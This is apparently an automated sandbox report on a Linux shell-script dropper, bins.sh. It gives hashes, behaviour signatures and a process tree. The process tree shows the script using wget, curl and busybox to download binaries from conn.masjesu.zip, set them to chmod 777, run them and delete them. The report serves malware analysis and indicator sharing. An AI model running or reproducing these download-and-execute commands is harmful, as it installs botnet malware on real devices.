Analysis

  • max time kernel
    72s
  • max time network
    104s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags
    arch:mipsel
    image:debian9-mipsel-20240226-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    28-10-2024 09:13

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b385712a9f0ed1dbec9bfc8275bb2da9

  • SHA1

    dedbedbd8e99674ee12610605d357a8375915d7d

  • SHA256

    7a1469a1ef092c727698affaffb0f788d398db1e393a4453f28aa140a8c943e7

  • SHA512

    1edd1419ac72eaf9befc0c174972fc05992bee64cc63851c526a43fa229181e080f0255f6fc9594a41b0fe23521fa4ed19eff11b2bb485679870f1155929227e

  • SSDEEP

    192:iZ//MNtZQV/VxcbrorvqKGXT0MbGadXLPoBp5//MNtZ0VxcbrSrveX90MbGadLPF:iZ//MNtZQV/VxcbrorvqKgT0MbGadXLX

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 8 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    PID:696
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:703
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:705
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:713
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:726
    • /bin/chmod
      chmod 777 b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
      2⤵
      • File and Directory Permissions Modification
      PID:728
    • /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
      ./b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
      2⤵
      • Executes dropped EXE
      PID:729
    • /bin/rm
      rm b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
      2⤵
      PID:732
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:733
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:734
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:736
    • /bin/chmod
      chmod 777 ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
      2⤵
      • File and Directory Permissions Modification
      PID:737
    • /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
      ./ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
      2⤵
      • Executes dropped EXE
      PID:738
    • /bin/rm
      rm ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
      2⤵
      PID:740
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:741
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:742

Downloads

  • /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ

    Filesize

    101KB

    MD5

    8d0f8d45165dc1f3ba334ce75be39621

    SHA1

    1d5baece9d5af3885276735c3c20d28e161e00ff

    SHA256

    17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791

    SHA512

    a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

  • /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3

    Filesize

    100KB

    MD5

    3b78bb645b81d600c30713d416f666be

    SHA1

    23796112f2cce2afb2217498b5ecf2801ab550f2

    SHA256

    d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

    SHA512

    9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

  • /tmp/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX

    Filesize

    88KB

    MD5

    e9e5d79acad49bbe6c77df0385ec77aa

    SHA1

    53bbc8b58873cf3117743fab15bd5508421370eb

    SHA256

    a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd

    SHA512

    828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381

  • /tmp/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX

    Filesize

    12KB

    MD5

    8bd9ed049a0d02b29a05249c4f5a48ef

    SHA1

    89ba06fada2c17657baac44c972ed118bedd4590

    SHA256

    f1998857b0ee9a2b0e863da21667097f6e2021f5574d0146a7b376b4d7a10b1c

    SHA512

    d9524b443d1e068c380bf5c14aac78a2dfd6b46763cd001275d048c2c276d51aff4ee9b98de91745b2efc7b4306adf8e82cede6409aff21bcb6881cc493a079c